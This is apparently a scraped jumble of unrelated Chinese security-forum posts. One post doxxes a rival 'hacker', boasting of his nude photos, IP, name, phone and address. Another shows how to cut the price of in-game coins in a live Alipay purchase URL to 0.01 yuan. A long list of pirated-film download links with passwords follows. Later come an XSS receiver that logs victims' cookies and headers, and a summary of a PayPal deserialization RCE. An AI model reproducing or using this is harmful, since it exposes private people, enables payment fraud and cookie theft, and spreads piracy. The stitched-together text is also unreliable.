背景：前几天我大习科算是风起云涌了
乌云漏洞就不多说了，看到一封“战书”。没错，来自某位黑客的战书！

习科道展论坛是什么地方？世界级的团队运营的论坛，国际黑客纷纷慕名而来。（没吹牛，没夸张，没装逼）咳咳...扯远了

这篇渗透全过程确实打码非常不错，当时又比较忙，今天才有时间来看看这位“黑客”到底是谁

给我社：
由于习科确实是一个很牛掰的地方，美国政府和大天朝都盯着这些的，所以对会员的资料在国内相对来说是非常高的，一不要你身份证/手机号，二不要你用QQ邮箱绑定
但是我就没辙了吗？《我是谁！没有绝对的安全》 咳咳，他妈的又扯远了。
首先看下这位“黑客” 的博客，我怀疑他在自己博客也发表了这篇文章，可能会有蛛丝马迹。

很遗憾，这位“黑客”自己的博客似乎全是很高端的“东西”，并没有找到我想要的“蛛丝马迹”，继续翻他微博

依然很遗憾，没有翻到有用的信息。。。等等，我在博客似乎看到了什么？

我去联系一下哇？

看下第二个QQ？

笑得咪咪痛，貌似还是我们漏洞团队之一的成员！！！草到自己人了哇，哈哈、都到这里了，不继续下去有点对不起这篇文章啊！（一边社工一边写的。）
从乌云号上尝试


好像这位黑客不太玩乌云哦！OK！
从QQ方面下手：
前面说了，这个黑客换了个QQ，但是新QQ估计都没什么资料。果不其然，我在第一个QQ里面找到了裸照。。。

黑客的媳妇↓

他反正是说他是媳妇，我很疑惑！！！黑客不应该都是高处不胜寒，独自走上人生巅峰吗？从裸照中不难看出是一位屌丝？屌丝不应该有媳妇啊！这TM没道理！
从百度下手：

一图胜千言，黑客玩得挺早的。好啦好啦，就到这里吧。IP、姓名、电话、住址几乎都到手了，不太方便继续放了。太过分就伤和气了。

友情提醒，不要觉得你眼中的大神有多“牛逼”，说不定就是SSS安全核心某人的小弟。甚至服务器权限都在我们手上
珍爱生命，远离黑客。

前奏，发现appstore搜索排行榜有个街机游戏机~然后就下载下来玩玩，
第一次登录，送了2k金币。。好少，啥都不玩的。里面有个抓娃娃。。。玩玩看，头几次抓到了，后面打死也抓不到，尼玛，怒了。


话说这个问题到底算是支付宝的还是游戏的？还是都有份？

PS:如此循环可以快速发家致富，走向人生巅峰，迎娶白富美，出任CEO
PPS:图多，手残党请自爱
PPPS:是不是标题长就可以让重视。

开启burp抓包~

点击买币的时候抓到个包

连接如下

?

1	http://lobby.dreambrother.cn:9090/lobby/gold/trade?sn=8bf997e6f86b920b64c68d424cd0f750c8*********************&ln=1&cl=2&ch=apple_yu_center&nu=20&fm=0

ok，目测觉得sn这个参数是本地用户名神马的，类似序列号一样的玩意，判断身份的~

恩，然后我就点击支付宝->648000金币

然后调到了这个页面

http://lobby.dreambrother.cn:9090/gold/trade/alipay /page?sn=8bf997e6f86b920b64c68d424cd0f750c8**********************& orderId=a9c3ae40ecba5bf65764146***********&coins=600.0&subject=金 币充值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用

sn=判断用户身份信息



orderId=订单号





coins=钱





对，你没看错，，就是钱。。

600.0

600块。。我100块都不给你，更别说600块了

改为0.01

恩，就出现下面这样的样子

http://lobby.dreambrother.cn:9090/gold/trade/alipay /page?sn=8bf997e6f86b920b64c68d424cd0f750c8379164db3d4983& orderId=a9c3ae40ecba5bf65764146159d4280b&coins=0.001&subject=金币充 值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用

恩，然后他就成了0.01了~

ok，去付款

解决方案：

。。api接口的问题吧，你说是支付宝的问题呢，还是你们游戏的问题呢 =~=

注册一个账号绑定邮箱手机后账户里就会有余额然后直接点申请主机就好选择按小时计算 这个余额还是可以欠着的，我已经申请了 而且邀请好友注册还可以加余额，邀请一个加5r余额要撸的话也可以用收码平台去撸,

邀请链接https://www.pppcloud.cn/index.html?referral_code=NTAzNDY1A8X5        (注册后我可以获得5RMB，何乐而不为。。。。)

截图

打码技术还不错吧。。。

0x00 摘要

在移动逆向分析以及 App 开发的时候，总会需要对其网络行为进行监控测试，本文总结一些抓包思路，并对其使用方法进行实践

笔者认为在抓包界，Wireshark 应该算是综合排名第一的工具（其实 Wireshark 自带的命令行工具 tshark 更牛逼）

本文总结记录了 5 种抓包方式，掌握其一即可进行实践，欢迎大家一起交流分享

- 阅读剩余部分 -

查询方法：

打开本页，按下“CTRL+F”组合键，在页面右上角的对话框里，输入你想要电影名称，即可在本页进行搜索！！！祝您愉快！

《东北偏北》HD高清：http://pan.baidu.com/s/1pKuYKlH 密码：yicf
《花街柳巷》BD高清：http://pan.baidu.com/s/1bnKPzAJ 密码：aajs
《手机/电话》BD高清：http://pan.baidu.com/s/1XcnyI 密码：9mys
《天之茶助》BD高清：http://pan.baidu.com/s/1pJRSwaB 密码：1pju
《女仆日记》BD高清：http://pan.baidu.com/s/1pKmlpvP 密码：jvs7

《我的青春期》HD高清：http://pan.baidu.com/s/1mgVvWdq 密码：7b1v
《虎影》BD高清：http://pan.baidu.com/s/1pKaF00r 密码：8kar
《鸡皮疙瘩》BD高清：http://pan.baidu.com/s/1jHf8LPc 密码：3jqs
《大空头》DVD高清：http://pan.baidu.com/s/1eRfHhey 密码：y54f
《西部战线》HD高清：http://pan.baidu.com/s/1nuqszf7 密码：i1uz
《突然变异》HD高清：http://pan.baidu.com/s/1XHUTS 密码：hg0f

《通灵神探》BD高清:http://pan.baidu.com/s/1bosEmvH 密码：fo0i
《实验者》BD高清:http://pan.baidu.com/s/1jGUJq2U 密码：s3of 旋
《假装热情》HD高清:http://pan.baidu.com/s/1gdYmE8z 密码：cym4 《日本最长的一天》BD高清:http://pan.baidu.com/s/1o6Rnbrs 密码：2bfd

《超新约全书》BD高清：http://pan.baidu.com/s/1o6WBOhG 密码：uzec
《电商时代》HD高清：http://pan.baidu.com/s/1pKebgwF 密码：brs5 《完美家伙》BD高清：http://pan.baidu.com/s/1skn067b 密码：tb7f
《人质/随机人质》BD高清：http://pan.baidu.com/s/1hrhDwAK 密码：39pp
《星球大战1魅影危》BD高清：http://pan.baidu.com/s/1i4b5Go9 密码：wiee
《星球大战前传2:克隆人的进攻》BD高清：http://pan.baidu.com/s/1pKuWqbp 密码：2um6
《星球大战前传3:西斯的复仇》BD：http://pan.baidu.com/s/1qWTjTk4 密码：th2k
《星球大战4:新希望》BD高清：http://pan.baidu.com/s/1o6VpQzw 密码：9gp9
《星球大战5：帝国反击战》BD高清：http://pan.baidu.com/s/1brYTpc 密码：j815
《星球大战6: 绝地大反击》BD高清：http://pan.baidu.com/s/1o7cHu4a 密码：4g8e

《姐妹》HD高清：http://pan.baidu.com/s/1jHvMgCY 密码：uqi1
《45周年》BD高清：http://pan.baidu.com/s/1sjTM9E9 密码：6r2o  《实习生》BD高清：http://pan.baidu.com/s/1pKkgkkj 密码：4whr
《诱狼》HD高清：http://pan.baidu.com/s/1jGWdgW2 密码：z67m
《聚焦》DVD高清：http://pan.baidu.com/s/1o7qogqA 密码：s4v4
《布鲁克林爱情》DVD高清：http://pan.baidu.com/s/1eQX73Dw 密码：xpul
《大叔阿什比》BD高清：http://pan.baidu.com/s/1dExXYVZ 密码：d6uv

《莫莉梦妮与神奇的催眠书》BD高清：http://pan.baidu.com/s/1o73euuQ密码：kzu5
《黑司祭们/黑祭司》HD高清：http://pan.baidu.com/s/1nuwupZj 密码：jydi  《天知道》BD高清：http://pan.baidu.com/s/1qX5HB3I 密码：n70r
《误杀瞒天计/瞒天》BD高清：http://pan.baidu.com/s/1OQLBo 密码：6h19
《幸存的女孩/最后的女孩》BD：http://pan.baidu.com/s/1nucH0MX 密码：hv7k
《十月初五的月光》HD高清：http://pan.baidu.com/s/1dDNyWOL 密码：qn27

《神探夏洛克》HD高清：http://pan.baidu.com/s/1jGM8bki 密码：tlrv
《尸体派对》BD高清：http://pan.baidu.com/s/1geaRp1h 密码：gic2
《火星救援》BD高清：http://pan.baidu.com/s/1dExV7ot 密码：mxxa
《燃情主厨/最强料理》BD高清：http://pan.baidu.com/s/1dDKGarB 密码：cnv3
《以我为名的变奏曲》HD高清：http://pan.baidu.com/s/1P5OQE 密码：aheo
《终极救援》HD高清：http://pan.baidu.com/s/1gdTzzaV 密码：otmg
《海街日记》BD高清：http://pan.baidu.com/s/1c1yDWiO 密码：4jzp
《紫霞》HD高清：http://pan.baidu.com/s/1o7sTWhk 密码：vt4w

《同班同学》BD高清粤语：http://pan.baidu.com/s/1boq7Qub 密码：pyo4
《少女日记》BD高清：http://pan.baidu.com/s/1mgRmS3I 密码：5s9r
《吉祥酒店》BD高清：http://pan.baidu.com/s/1eQJWZsQ 密码：ylha 《猫侍.前往南之岛》BD高清：http://pan.baidu.com/s/1sk4rSp3 密码：g14v
《山河故人》HD高清：http://pan.baidu.com/s/1bjibl8 密码：1k2r
《从天儿降》HD高清：http://pan.baidu.com/s/1boq76EF 密码：bss7
《不可思异》HD高清：http://pan.baidu.com/s/1jHoXs6i 密码：ifkb
《年轻时候》BD高清：http://pan.baidu.com/s/1qXbUc80 密码：o567
《杜拉拉追婚记》HD高清：http://pan.baidu.com/s/1ntQ4R49 密码：5gjl
《我的少女时代》BD高清：http://pan.baidu.com/s/1c0KH94k 密码：6d9t

《龙虾》HD高清：http://pan.baidu.com/s/1gepcDaF 密码：ztye
《无理之人》BD高清：http://pan.baidu.com/s/1o7sSmka 密码：v9pp
《罪恶之家》HD高清：http://pan.baidu.com/s/1sjSxJ7R 密码：fcxq
《火星救援》BD高清：http://pan.baidu.com/s/1qXwjGsc 密码：dpwg

《坏蛋必须死》HD高清：http://pan.baidu.com/s/1baZrPk 密码：l074
《荒野猎人》DVD高清：http://pan.baidu.com/s/1bom2DAZ 密码：e7wt
《怦然星动》HD高清：http://pan.baidu.com/s/1gevOknh 密码：37ti
《我爸比我小四岁》HD高清：http://pan.baidu.com/s/1pKfYMrL 密码：r9hv
《美国英雄》HD高清：http://pan.baidu.com/s/1mhbvmTq 密码：abkn

《007：幽灵党》DVD高清：http://pan.baidu.com/s/1bnIGcBt 密码：uh12
《探访惊魂》BD高清：http://pan.baidu.com/s/1nugcwCL 密码：iw2m
《间谍之桥》DVD高清：http://pan.baidu.com/s/1nun3WSD 密码：imb9

《既然青春留不住》HD高清：http://pan.baidu.com/s/1o7wnTpg 密码：sxxz
《落跑吧爱情》BD高清：http://pan.baidu.com/s/1kUzbS27 密码：8n5k
《解救吾先生》BD高清：http://pan.baidu.com/s/1mgPOil6 密码：6ync
《死后的关怀》BD高清：http://pan.baidu.com/s/1nu3HHkl 密码：g52j
《小喽啰》HD高清：http://pan.baidu.com/s/1jHkkZyQ 密码：soi4
《沼泽地》BD高清：http://pan.baidu.com/s/1c0Oc9vq 密码：h6ov
《今天的恋爱》BD高清：http://pan.baidu.com/s/1c1ldriw 密码：ucin
《脑浆炸裂少女》BD高清：http://pan.baidu.com/s/1sknu8rF 密码：17qh

《心迷宫/殡棺》HD高清：http://pan.baidu.com/s/1eQLWxRO 密码：lnza
《地球女王/尘世女》HD高清：http://pan.baidu.com/s/1o7r4kLO 密码：j5en
《林中漫步》BD高清：http://pan.baidu.com/s/1biznps 密码：j87j
《太平轮：彼岸》BD高清：http://pan.baidu.com/s/1bobB90r 密码：lw83
《摇滚水果》HD高清：http://pan.baidu.com/s/1pJSzFjP 密码：bf3q

男二本色：http://pan.baidu.com/s/1sk39poT 密码：ruiq

实习生：http://pan.baidu.com/s/1dDJW6JZ 密码：s5v8
乔迪尔特历险记2：http://pan.baidu.com/s/1kUigBdH 密码：g72e
边境杀手：http://pan.baidu.com/s/1bpk6Zk 密码：krnu
山河故人：http://pan.baidu.com/s/1bniMXC 密码：joyx
火星救援：http://pan.baidu.com/s/1qXwjGsc 密码：dpwg
诡眼：http://pan.baidu.com/s/1qX3BnVe 密码：6qs1
吸血鬼之恋：http://pan.baidu.com/s/1skqHUqh 密码：zslc

色即是空1:http://pan.baidu.com/s/1o7r3KkM 密码：12rm
色即是空2:http://pan.baidu.com/s/1i3YHfST 密码：dl77
华丽上班族:http://pan.baidu.com/s/1kUspRIB 密码：9zl4
僵尸启示录：童军:http://pan.baidu.com/s/1bq6wqU 密码：ne09
云中行走:http://pan.baidu.com/s/1i3PTGdn 密码：li1o
侠女：剑的记忆:http://pan.baidu.com/s/1hriSBpM 密码：tyj4

鬼影实录5：鬼次元：http://pan.baidu.com/s/1skiAjPb 密码：turh
我的少女时代：http://pan.baidu.com/s/1dEy7HMp 密码：m698
名侦探柯南：江户川柯南失踪事件：http://pan.baidu.com/s/1kUge9XP 密码：bdwm
解救吾先生/最强对手：http://pan.baidu.com/s/1hrcgWBy 密码：mugu

剩者为王：http://pan.baidu.com/s/1qWQvro4 密码：rkso
前任2：备胎反击战：http://pan.baidu.com/s/1SjJ6u 密码：minq
教师：http://pan.baidu.com/s/1mhojXEC 密码：eot3
跟别人睡了：http://pan.baidu.com/s/1kTVVhe3 密码：m62f
实习生：http://pan.baidu.com/s/1kUbuJND 密码：jjem
雨夜惊魂：http://pan.baidu.com/s/1sjY0DQH 密码：sgh1

角头：http://pan.baidu.com/s/1kTNh8Qb 密码：rtyu
浪漫天降：http://pan.baidu.com/s/1bhcIz8 密码：nd7a
青田街一号：http://pan.baidu.com/s/1qXsL1PM 密码：d05b

十七岁：http://pan.baidu.com/s/1bnHYcQ7 密码：cz9a
百日红/北斋小姐：http://pan.baidu.com/s/1bovnHJD 密码: p9dp
年轻的女王：http://pan.baidu.com/s/1o6PdqXk 密码: uvsi
失踪秘闻：http://pan.baidu.com/s/1hrh6zWw 密码: disa
美国英雄：http://pan.baidu.com/s/1qXbk3Wo 密码: 6jy9
色即是空2015：http://pan.baidu.com/s/1i4yzumT 密码：zs62
尸忆/冥婚：http://pan.baidu.com/s/1bnUj07d 密码: 6kfc

巴啦啦小魔仙之魔箭公主： http://pan.baidu.com/s/1dEtNBsl 密码: 2s8n

消失的凶手：http://pan.baidu.com/s/1eRiqn5o 密码：o5u8
我们是你的朋友/音浪青春：http://pan.baidu.com/s/1qXwjaEC 密码: bmnn
探灵档案：http://pan.baidu.com/s/1hrxLoOG 密码: a96n

从天儿降：http://pan.baidu.com/s/1dDLr38H 密码：b0q4
坏蛋必须死：http://pan.baidu.com/s/1sk4opHF 密码：4j0r
不可思异：http://pan.baidu.com/s/1dDLr38H 密码：b0q4
我是证人：http://pan.baidu.com/s/1o7qNska 密码：oamf
重生：http://pan.baidu.com/s/1sk5AmRj 密码：w84a
爱的成人式：http://pan.baidu.com/s/1hqTsZbQ 密码：89wk
投靠女与出走男：http://pan.baidu.com/s/1bnPz0x5 密码：pgdd
预告犯：http://pan.baidu.com/s/1c1tP736 密码：tawk
僵尸启示录：童军手册：http://pan.baidu.com/s/1bofEzcb 密码：0sm3

色即是空2015：http://pan.baidu.com/s/1kUifVMJ 密码: 1pq3
僵尸启示录：童军手册：http://pan.baidu.com/s/1Wnaeq 密码: vkae
猩红山峰/血色庄园：http://pan.baidu.com/s/1c0WOPe4 密码: 61fe
生活/我们走过叛逆年代：http://pan.baidu.com/s/1i4eMloh 密码: fvpq
鲨鱼湖泊：http://pan.baidu.com/s/1bnNW2E 密码: uy5q
死亡高潮：http://pan.baidu.com/s/1KbIVk 密码: yuwe
云中行走/走钢索的人：http://pan.baidu.com/s/1sksdfuX 密码: pg7a
摩登神探2015：http://pan.baidu.com/s/1c1gYn1A 密码: wqt6
死神来袭：http://pan.baidu.com/s/1bos5AmN 密码: yqyb
绝色少女变身记：http://pan.baidu.com/s/1gdRteaJ 密码: khbx
微博直播杀人事件：http://pan.baidu.com/s/1i3TWOQx 密码: 4wim
光棍奇遇记3： http://pan.baidu.com/s/1eRb46Ds 密码: xz6k

魔卡行动：http://pan.baidu.com/s/1pKfVLMj 密码：78hf
小飞侠：幻梦启航：http://pan.baidu.com/s/1o6Vi4L8 密码: zyde
狐仙丽莎煞煞煞：http://pan.baidu.com/s/1c1rh67m 密码: 7x63
兄弟难当：http://pan.baidu.com/s/1bu9yME 密码: pg9c
莞城往事：http://pan.baidu.com/s/1nugFNJV 密码: y5zc

怦然星动（tc版）：http://pan.baidu.com/s/1nuslbkd 密码: m5k
不要脸：http://pan.baidu.com/s/1i3Xu2lJ 密码: sczi
微笑回应：http://pan.baidu.com/s/1pKa6dD5 密码：wpsm
险恶2：http://pan.baidu.com/s/1nuxAHap 密码：1c39
恋爱诊疗中：http://pan.baidu.com/s/1jHwuV6u 密码: i2jb
西游外传之八戒娶亲：http://pan.baidu.com/s/1c0IB86O 密码: 51sf
穿越成神：http://pan.baidu.com/s/1c0KD19A 密码: 8fag
南京东1937：http://pan.baidu.com/s/1mhgHOxE 密码: nvtd

从天儿降（tc版）：http://pan.baidu.com/s/1mhbYbMw 密码: mv14
不可思异/非法操作（tc版）：http://pan.baidu.com/s/1i3O6YFF 密码: 63qh
禁忌关系/狙击唐小婉：http://pan.baidu.com/s/1pJW2mGb 密码: ggyw
攻炮砖家： http://pan.baidu.com/s/1gdNpgl1 密码: desm
时尚女郎之女人江湖：http://pan.baidu.com/s/1eRzkSh0 密码: p6fy
蛇姬恋： http://pan.baidu.com/s/1kTQ4Loz 密码: nzdb
鸡皮疙瘩：http://pan.baidu.com/s/1o7ofn8u 密码: icqc
海浪：http://pan.baidu.com/s/1eQX08zo 密码: gcm6
一个很默瑞的圣诞节： http://pan.baidu.com/s/1qXbPTve 密码: 42dv

对不起,我爱你,谢谢你：http://pan.baidu.com/s/1eQK9fG2 密码: 6h7p
火星救援（ts版）：http://pan.baidu.com/s/1c0PwPY4 密码：b53d

十月初五的月光：http://pan.baidu.com/s/1gdAZg2n 密码：azjo
魔法教师/魔法老师：http://pan.baidu.com/s/1qWBwGMC密码: ywwk
爱恋/爱恋3D：http://pan.baidu.com/s/1kTsAfiB 密码: tvvb

半夜叫你别回头：http://pan.baidu.com/s/1hq4luoG 密码：fw1d
熊孩子：http://pan.baidu.com/s/1qWMRWIw 密码：vqu2
月珑湾之解救武先生： http://pan.baidu.com/s/1dDpxMmt 密码: nxuw
极地大反攻：http://pan.baidu.com/s/1i3noxwx 密码: set2
中国危险食品：http://pan.baidu.com/s/1dDoc2Tr 密码: iir8
重返时间之旅/回到那个时间：http://pan.baidu.com/s/1ntrQaTF 密码: n7vq
面具之下：http://pan.baidu.com/s/1gdAZbKR 密码: gur9

海岸情深：http://pan.baidu.com/s/1dDuNYzJ 密码：anq6
幸福的小杨屯：http://pan.baidu.com/s/1dD0nG5N 密码: accj

大侦探夏洛克之索命密室：http://pan.baidu.com/s/1sjxNtaX 密码: e259
天女猎妖团：http://pan.baidu.com/s/1qWvN7dE 密码: yqud
疯狂的U盘：http://pan.baidu.com/s/1jG1z0Iq 密码: 9hiy
美满归宿：http://pan.baidu.com/s/1eQryjPS 密码: x2ri

暴走超人：http://pan.baidu.com/s/1hqyf5LM 密码: kky
爱与和平：http://pan.baidu.com/s/1c0mc2pM 密码: ffmd
美国情人/美国女主人：http://pan.baidu.com/s/1i30frPr 密码: rapv
蒙羞之旅/姐姐我醉大：http://pan.baidu.com/s/1jGIum26 密码: acka
抗日传奇之五侠聚义：http://pan.baidu.com/s/1jG8kUGm 密码: j598
抗日传奇之侠影追踪：http://pan.baidu.com/s/1mgF80IW 密码: 34kb
抗日传奇之血战到底：http://pan.baidu.com/s/1bn8zlxX 密码: r9k2
抗日传奇之所向无敌：http://pan.baidu.com/s/1qkroi 密码: ha78
无码青春期：http://pan.baidu.com/s/1i3zz6Od 密码: wy58

精灵旅社2：http://pan.baidu.com/s/1gd37iiZ 密码：4ldz

还我一个家：http://pan.baidu.com/s/1dDmGpmL 密码: 52j8
道士降魔2之僵尸村：http://pan.baidu.com/s/1gdHKsH9 密码: r76s
赌鬼传奇之开心赌鬼：http://pan.baidu.com/s/1o6w7nuU 密码: jv5u
你别吓唬我：http://pan.baidu.com/s/1gdlqmv5 密码: nj6v
大山之上：http://pan.baidu.com/s/1o6ndOFK 密码: vbcd
求爱大作战： http://pan.baidu.com/s/1mg4cSoK 密码: myqd
放飞： http://pan.baidu.com/s/1eQhU1Mi 密码: 4fnj
饥恶游戏：http://pan.baidu.com/s/1nt4GNwd 密码: fqjn
床上观戏：http://pan.baidu.com/s/1kTJDZan 密码: c86y
捉妖济3人鬼殊途： http://pan.baidu.com/s/1ntAM2fv 密码: 8dnt
魔幻笔记之九龙无字天书：http://pan.baidu.com/s/1eQsJKRK 密码: y8fz
恋上女教师/校囧：http://pan.baidu.com/s/1pJxRi4r 密码: rexv
喝彩：http://pan.baidu.com/s/1kTs9IF9 密码：u5aw
幻象：http://pan.baidu.com/s/1i3xxxOT 密码：9map

天下无单：http://pan.baidu.com/s/1mgIVRTY 密码: vyy4

一个勺子：http://pan.baidu.com/s/1ntND2kT 密码: e6b3
这个杀手不太灵：http://pan.baidu.com/s/1bncAC6V 密码: i8aj
僵尸王爷： http://pan.baidu.com/s/1pJ8GtXh 密码: 3ucm
墓穴迷城：链接: http://pan.baidu.com/s/1pJL77fX 密码: 7h3w
脑内中毒大作战/恋爱中毒大作战：http://pan.baidu.com/s/1bnG6xJp 密码: ddqa
印度女王：鲁德拉玛德维女王；http://pan.baidu.com/s/1sRIVk 密码：74q1
近距离：http://pan.baidu.com/s/1eQ0lfSA 密码: 5gwg
99个家/我想有个家：http://pan.baidu.com/s/1jGtXth8 密码：v3lx
犯罪现场：灼人：http://pan.baidu.com/s/1pJOpzRH 密码: xp9s
诡打墙：http://pan.baidu.com/s/1eQJie58 密码：rhg2
幻影：http://pan.baidu.com/s/1mgtn75Y 密码：bcp5
化妆师：http://pan.baidu.com/s/1eQe65Ku 密码: wfa2

夏洛特烦恼：http://pan.baidu.com/s/1sjziBF3 密码: gh73

校花驾到2蜜桃时代：http://pan.baidu.com/s/1dDe8yRJ 密码: emmk
我的少女时代（tc版）：http://pan.baidu.com/s/1dDHigt7 密码: gs96
家有虎妻：http://pan.baidu.com/s/1i36k9nR 密码: ru9k
数码宝贝大冒险 tri. 第1章 再会：http://pan.baidu.com/s/1i3rrp8T【提取密码】：2ajc

青鬼2：http://pan.baidu.com/s/1dDltVbF 密码: 2i41
杰姆和全息图：http://pan.baidu.com/s/1bnbUDCb 密码：gamb

突然变异/鱼男悲歌：http://pan.baidu.com/s/1hqCshik 密码: pdkc
妈妈，让我再爱你一次：http://pan.baidu.com/s/1o6Kn22Y 密码: uqb2
寻龙密码之真假棺椁：http://pan.baidu.com/s/1bnboEcv 密码: kuf8
天堂90分钟/在天堂90分钟：http://pan.baidu.com/s/1dDpxCe1 密码: 63ne
维多利亚/柏林惊魂夜：http://pan.baidu.com/s/1c0nxMKC 密码: efxd

警匪警：http://pan.baidu.com/s/1i3IvInV 密码: g4b2
第52届金马奖 颁奖典礼：http://pan.baidu.com/s/1bnx9ovH 密码: 2rez
霸道学姐爱渣男：http://pan.baidu.com/s/1eQAutns 密码: r9pw
真实魔鬼游戏： http://pan.baidu.com/s/1gdGxRAb 密码: 5ye3
暗月升起/黑月升起：http://pan.baidu.com/s/1c0HPTYg 密码: up7i
僵尸来袭/死亡之路：http://pan.baidu.com/s/1mg3w60o 密码: 6dki
33名矿工：http://pan.baidu.com/s/1A26fG 密码: ef4j
边境杀手/毒裁者/怒火边界：http://pan.baidu.com/s/1o63YsMu 密码: h2sj

猛龙特囧：http://pan.baidu.com/s/1c0c8tpu 密码：wam4
次世代机动警察：首都决战：http://pan.baidu.com/s/1gdFbT0B 密码：x6dq
边境杀手/毒裁者/怒火边界：http://pan.baidu.com/s/1o63YsMu 密码: h2sj

笔仙魔咒：http://pan.baidu.com/s/1kTgxG8n 密码：tua3

蚁人/蚁侠：http://pan.baidu.com/s/1qWIhjQG 密码：5yb1
玩命速递：重启之战：http://pan.baidu.com/s/1nttQTeh 密码: sv1n
小王子： http://pan.baidu.com/s/1gd7AjWf 密码: mged
如此美好：http://pan.baidu.com/s/1c0odAoC 密码: mnn9
猫的葬礼：http://pan.baidu.com/s/1eQ4o3o2 密码: 2zh7
斯坦福监狱实验：http://pan.baidu.com/s/1hqFFIAS 密码: iehx
巷囧：http://pan.baidu.com/s/1o6KnnE6 密码: c4tt
杀死二狗： http://pan.baidu.com/s/1eQ0kI7C 密码: rghi

沉睡的妮可：http://pan.baidu.com/s/1nt1sqoD 密码: m36m

道士出山3外星古墓(上):http://pan.baidu.com/s/1kTjf5zx 密码: tqat
岭城兄弟2：http://pan.baidu.com/s/1qWMkPL6 密码: qyhb
痞子·洛克/神秘的洛克：http://pan.baidu.com/s/1o6AdGpk 密码: 4121
爱情攻略：http://pan.baidu.com/s/1pJnbdjX 密码: nwd1
云烟深处：http://pan.baidu.com/s/1bnyoPMf 密码: qqx3
三体之灵魂危机:http://pan.baidu.com/s/1bniFLtP 密码: qm87
希望治愈悲伤:http://pan.baidu.com/s/1FROVs 密码: mmy9
赶尸惊魂:http://pan.baidu.com/s/1i3ErEtf 密码: s95y
野狼与玛莉:http://pan.baidu.com/s/1bn9elht 密码: d2ch
九层魔塔: http://pan.baidu.com/s/1i3wGIDB 密码: ym3y

诡劫/暗洞惊魂：http://pan.baidu.com/s/1bnofy2r 密码：6x5r

思悼：八日的记忆：http://pan.baidu.com/s/1i3Ivtbf 密码: b6jq
有夫之妇：http://pan.baidu.com/s/1o6CL1H4 密码: utib
攀登梅鲁峰：http://pan.baidu.com/s/1kTGVten 密码：1f9y
没女神探：http://pan.baidu.com/s/1hq78dEk密码：vslr
侦探：为了原点：http://pan.baidu.com/s/1o6Gjkng 密码: kniw

真命天子·真英雄：http://pan.baidu.com/s/1bnwSI5L 密码：riis
庇护所：http://pan.baidu.com/s/1kT93KKB 密码: kqnb

首先JAVA中的类方法不像php的函数中有那么多的漏洞。

java源代码安全文章主要是总结一下，学习一下，希望大家多多指教。

Java源代码安全系列文章，将从java本身的函数和三大主流框架的角度去对项目中的类、方法、参数可能存在的漏洞进行实现，方便代码审计中的学习，结合一些半自动化审计工具，发现项目中的安全问题，给出一些关键字方便审计时的直接定位。

MVC请参考我园长师傅的：http://drops.wooyun.org/tips/347
JavaWeb安全系列：http://drops.wooyun.org/author/%E5%9B%AD%E9%95%BF

小弟不才，有建议大家多提一下，多多学习。

在框架和jdk中有很多的SQL查询实现类，拼接查询、占位符查询、参数化绑定查询很多，但是目前大多数框架已尽采用了占位符查询（为了安全同时也为了性能的提升），但是依然有一些开发人员在框架中使用拼接查询，造成了安全问题的产生，给公司带来不可避免的损失。

JAVA JDK中的Statement和PreparedStatement

java.sql.Statement  拼接查询 java.sql.PreparedStatement   预编译查询 java.sql.Connection.prepareCall  调用存储过程 ( 不尽兴过多描述)

1、Statement查询

2、PreparedStatement查询

Spring框架中JDBC查询

org.springframework.jdbc.core.JdbcTemplate  jdbc模版类

在Spring框架中有很多的数据库实现类，比如：org.springframework.jdbc.core.JdbcOperations、org.springframework.jdbc.core.PreparedStatementCreatorFactory、org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate、org.springframework.jdbc.core.simple.SimpleJdbcTemplat等等，于是我们只需要去找到实现数据库会话类，通过查询哪些类调用了数据库查询会话类即可。

因为Spring Jdbc中涉及到大量的sql查询类，不一一进行描述说明，大部分还是依赖JdbcTemplate，但是我们一定要知道JdbcTemplate类内部还是根据DataSourceUtils来获取数据库连接的。

Hibernate框架

org.hibernate.SessionFactory   工厂类实例，用来创建Session org.hibernate.Session    查询的Session，一个数据库会话 org.hibernate.Query    查询语句类

避免的标准格式有很多，当我们看到这些方式可以绕过，不排除有二次查询漏洞的产生。
1、参数绑定方式查询
2 、占位符方式查询
3、setParameter()方法
4、setProperties()方法（根占位符区别不大）

在审计过程中我们完全可以依赖Eclipse Search功能来进行定位或搜索我们需要的类、方法或常量变量

2016年学生狗福利高中数学.语文.历史.地理.化学.物理复习资料重点都在里面分享百度了解可能会和谐真心想要的自己@我在留言板把百度账号给我！我这边单独分享给你们！

链接: http://pan.baidu.com/s/1pKuxmER 密码: j776

看雪上瞅见的:
http://bbs.pediy.com/showthread.php?t=207511

功能：

1、支持微信、QQ自动抢红包

2、支持手机待机下自动抢红包

3、优化代码，抢红包更快、更稳

源码:

https://github.com/WooyunDota/QiangHongBao

曾经发过一次开源的xss平台
http://zone.wooyun.org/content/23697

更新至3.1，算是一个稳定版本吧，预期的功能已都实现，详细介绍可以看github里的README.md

特点：单用户，无sql，安装及其方便，对环境几乎无要求，可直接在php虚拟空间使用
（如果需要keepsession需要curl支持，sae可自行修改下keepsession.php即可）

主要功能
xss记录：记录所有收到的get、post、cookie以及header，ip归属地等信息，支持base64检测自动解码 js公用模板，我的js：可以直接添加修改js，采用ace编辑器，支持js语法高亮，语法错误检查，在编辑器里可直接代码格式化与最小化，集成xssor部分功能，方便生成payload， 新消息提醒：仿QQ邮箱新消息提醒框 邮件通知 安全方面考虑：开启csp，挑战应答式登录，密码输错5次封ip，session与ip、useragent绑定 自带部分js模板（来自各大xss平台，除了前先天正好想研究下截图自己写了个，当然前人早就做了类似的了）

展示下界面好了

=======================================================
源码地址https://github.com/firesunCN/BlueLotus_XSSReceiver
=======================================================
如果觉得不错。。star下可好

原文:http://artsploit.blogspot.com/2016/01/paypal-rce.html
在去年12月国外安全研究员发现了一个manager.paypal.com的java序列化漏洞并报告给了paypal进行修复.
这个漏洞异于之前大家发的weblogic jboss websphere等序列化漏洞，并不是直接对某个rmi直接POST带有攻击的payload。

漏洞详情:
当漏洞发现者对manager.paypal.com站进行安全测试的时候留意到有一个表单请求里有个oldForm参数base64解码后疑似一个java的object。

经过分析后确认这个参数可以接受一个未经任何验证的java序列化后的object。意味着可能存在之前的apache commons collections序列化漏洞，机智的作者利用ysoserial生成payload测试后发现果然存在此漏洞.

通过执行shell命令，测试是否能发送DNS请求和HTTP请求到他自己的服务器:

通过对oldFormData参数base64编码后作者真的在自己的nginx日志里找到了来自PayPal的请求,下面是访问日志截图:

